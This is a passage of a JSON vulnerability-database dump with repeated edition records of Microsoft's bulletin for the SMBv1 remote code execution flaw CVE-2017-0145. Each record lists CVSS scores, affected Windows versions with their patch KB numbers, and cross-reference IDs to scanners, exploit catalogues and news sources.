x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-21T10:46:37", "differentElements": ["msAffectedSoftware"], "edition": 75}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in 
the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-25T23:09:38", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", 
"MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", 
"RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-21T10:46:37", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-21T10:46:37", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB4012598", "KB4012215", "KB4012212", "KB4012214", "KB3205401", "KB4013198", "KBMS16-110, 3187754", "KB4012216", "KB4014077", "KB3177186", "KB4012606", "KB3210721", "KB4012217", "KB3205409", "KB3210720", "KB4013429", "KB3212646", "KB3213986"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": 
"KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": 
""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": 
"Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": 
"KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": 
"KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-25T23:09:38", "differentElements": ["msAffectedSoftware"], "edition": 76}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, 
"cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-26T00:46:05", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": 
"attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-26T00:46:05", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-26T00:46:05", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KBMS16-110, 3187754", "KB3210720", "KB4012217", "KB3177186", "KB3213986", "KB4012216", "KB3205409", "KB4012213", "KB4012214", "KB3205401", "KB4012212", "KB4014077", "KB4012606", "KB4012598", "KB3210721", "KB4012215", "KB3212646", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service 
Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 
Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", 
"msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-26T00:46:05", "differentElements": ["msAffectedSoftware"], "edition": 77}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", 